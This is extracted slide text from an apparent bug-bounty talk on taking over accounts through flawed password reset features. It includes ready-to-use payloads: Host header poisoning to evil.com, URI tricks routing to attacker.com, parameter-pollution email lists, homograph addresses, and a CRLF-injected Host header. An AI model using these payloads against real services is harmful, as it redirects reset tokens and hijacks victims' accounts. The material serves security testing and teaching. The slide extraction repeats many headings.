Account Takeover via Exploiting Misconfigured Password Reset Feature By Tuhin Bose

Who am I?

Conclusion & QNA Conclusion & QNA What is Password What is Password Reset Feature? Reset Feature? Password Reset Password Reset Implementation Implementation Techniques Used by Techniques Used by Developers Developers ATO via Hacking ATO via Hacking Misconfigured Misconfigured Password Reset Feature Password Reset Feature AGENDA

What is Password Reset Feature?

Reset password is the action of invalidating the current password for an account on an application and then setting a new one. Most of the services have a password reset feature ("Forgot Password" service) which allows you to reset your password.

Password Reset Implementation Techniques Used by Developers

Password Reset Implementation Techniques Used by Developers

ATO via Hacking Misconfigured Password Reset Feature

Host Header Injection - Password Reset Host Header Injection - Password Reset Poisoning Poisoning 1 1. . Host: evil.com or X-Forwarded-Host: evil.com

Password Reset Poisoning Password Reset Poisoning 1 1. .

2. Modifying Request-URI 2. Modifying Request-URI POST https://attacker.com/forgot-password HTTP/1.1 POST @attacker.com/forgot-password HTTP/1.1 POST :@attacker.com/forgot-password HTTP/1.1 POST /forgot-password@attacker.com HTTP/1.1

2. Modifying Request-URI 2. Modifying Request-URI

2. Modifying Request-URI 2. Modifying Request-URI

3. Token leakage 3. Token leakage

3. Token leakage 3. Token leakage https://www.company.com/#/changePassword/ username/token

4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP) email=v@g.com&email=a@g.com email[]=v@g.com&email[]=a@g.com email=v@g.com%20email=a@g.com email=v@g.com|email=a@g.com email=v@g.com,a@g.com email=v@g.com%20a@g.com {"email":"v@g.com","email":"a@g.com"} {"email":["v@g.com","a@g.com"]}

4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

5. Insecure Direct Object Reference (IDOR) 5. Insecure Direct Object Reference (IDOR) Use Param Miner to get extra parameters (or append previously known parameters) in the request. Now try IDOR.

5. Insecure Direct Object Reference 5. Insecure Direct Object Reference

6. Try homograph on password reset. 6. Try homograph on password reset. email=victim@gmail.com email=victim@gmаil.com email=victim@xn--gmil-63d.com Using Unicode: Cyrillic Small Letter A

6. Try homograph on password reset. 6. Try homograph on password reset. https://github.com/UndeadSec/EvilURL

6. Try homograph on password reset. 6. Try homograph on password reset. Steps to reproduce: 1. Create a new account with tuhin1729@gmail.com.xyz.burpcollaborator.net 2. Go to password reset page and enter this email: tuhin1729@gmаil.com.xyz.burpcollaborator.net [Here "a" is different] If it's vulnerable then you'll get the password reset link to your collaborator server.

7. If they are sending an otp for password reset, 7. If they are sending an otp for password reset, try 2fa bypass techniques. try 2fa bypass techniques. https://tinyurl.com/tuhin1729-2fa

8. 8. Append a .json after the endpoint. Append a .json after the endpoint.

9. Weak Encryption 9. Weak Encryption While generating password reset tokens, sometimes developers use weak encryption algorithms. For example, sometimes they just encrypt the user-id/username of user + timestrap using some weak encryption algorithms .

POST /resetpassword?%0d%0aHost:%20attacker.com HTTP/1.1 10. 10. CRLF Injection CRLF Injection

10. 10. CRLF Injection CRLF Injection

11. Change the request method and content-type and observe how the application is responding. Original Modified

12. Append null bytes after your email and observe the response. {"email":"tuhinbose70@gmail.com"} {"email":"tuhinbose70@gmail.com%00"} %00, %0d%0a, %0d, %0a, %09, %0C, %20

More: More: https://tinyurl.com/tuhin1729-passwordreset

Twitter: @tuhin1729_ | Medium: @tuhin1729 | Instagram: @tuhin1729 Thank You! Thank You! Thank You!